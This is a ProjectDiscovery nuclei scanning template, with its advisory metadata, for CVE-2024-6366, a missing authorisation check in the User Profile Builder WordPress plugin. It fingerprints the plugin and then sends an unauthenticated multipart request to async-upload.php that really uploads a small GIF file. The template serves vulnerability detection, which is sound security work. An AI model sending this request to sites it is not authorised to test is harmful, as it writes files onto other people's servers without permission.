NUCLEI:CVE-2024-6366 (ProjectDiscovery nuclei template)

User Profile Builder < 3.11.8 - File Upload

Published: 2024-07-29 17:07:32
Source: ProjectDiscovery (github.com)
Tags: cve, wpscan, file upload, wordpress plugin, intrusion detection, profile builder

CVSS3: 9.1
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

AI Score: 7.1 (Confidence: High)
EPSS: 0.001 (Percentile: 21.8%)

The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.

id: CVE-2024-6366

info:
  name: User Profile Builder < 3.11.8 - File Upload
  author: securityforeveryone
  severity: high
  description: |
    The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.
  reference:
    - https://wpscan.com/vulnerability/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e/
    - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6366
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6366
  classification:
    cve-id: CVE-2024-6366
    epss-score: 0.00043
    epss-percentile: 0.09351
  metadata:
    vendor: cozmoslabs
    product: user-profile-builder
    framework: wordpress
    publicwww-query: "/wp-content/plugins/profile-builder"
  tags: cve,cve2024,wpscan,file-upload,intrusive,wp-plugin,wordpress,wp,profile-builder

# Run the second request only when the first (plugin fingerprint) matches
flow: http(1) && http(2)

variables:
  filename: "{{to_lower(rand_text_alpha(12))}}"

http:
  # Request 1: fingerprint the plugin from the front page (internal matcher, not reported)
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/plugins/profile-builder")'
        internal: true

  # Request 2: unauthenticated multipart POST to the core async-upload endpoint with
  # the plugin's wppb_upload flag; a JSON body reporting success confirms the missing check
  - raw:
      - |
        POST /wp-admin/async-upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="wppb_upload"

        true
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="meta_name"

        {{filename}}.gif
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="_wpnonce"

        e8
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="action"

        upload-attachment
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="async-upload"; filename="{{filename}}.gif"
        Content-Type: image/jpeg

        GIF89a

        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"id"'
          - '"uploadedTo"'
        condition: and

      - type: word
        part: header
        words:
          - 'Content-Type: text/plain'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c097589d319c657b57ec2360a4918baeb01717391160a286990beb6798a607bf02204f0b692c85592fede96803d81734e118aea1c204b84e51a0e212e8d0c557c868:922c64590222798bb761d5b6d8e72950